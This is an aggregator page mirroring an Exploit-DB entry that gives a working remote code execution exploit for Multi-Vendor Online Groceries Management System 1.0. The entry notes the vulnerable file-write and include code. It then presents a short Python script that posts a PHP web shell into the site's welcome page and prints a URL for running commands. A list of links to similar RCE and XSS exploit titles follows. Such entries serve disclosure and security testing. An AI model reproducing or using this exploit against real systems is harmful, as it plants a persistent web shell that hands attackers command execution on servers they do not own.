[webapps] Multi-Vendor Online Groceries Management System 1.0 - Remote Code Exec...
source link: https://www.exploit-db.com/exploits/51394
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution
# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE)
# Date: 4/23/2023
# Author: Or4nG.M4n
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: windows
#
# Vuln File : SystemSettings.php < here you can inject php code
# if(isset($_POST['content'])){
# foreach($_POST['content'] as $k => $v)
# file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want
# }
# Vuln File : home.php < here you can include and execute you're php code
# <h3 class="text-center">Welcome</h3>
# <hr>
# <div class="welcome-content">
# <?php include("welcome.html") ?> <=== include
# </div>
import requests
url = input("Enter url :")
postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'}
resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata)
print("[+] injection in welcome page")
print("[+]"+url+"/?cmd=ls -al")
print("\n")
Recommend
-
97
README.md grocy ERP beyond your fridge Give it a try Public demo of the latest stable version → ...
-
2
Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)...
-
3
Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated...
-
3
Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)...
-
5
Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload...
-
1
Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)...
-
3
ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)...
-
6
Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)...
-
5
Best POS Management System v1.0 - Unauthenticated Remote Code Execution...
-
11
Online Piggery Management System v1.0 - unauthenticated file upload vulnerability...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK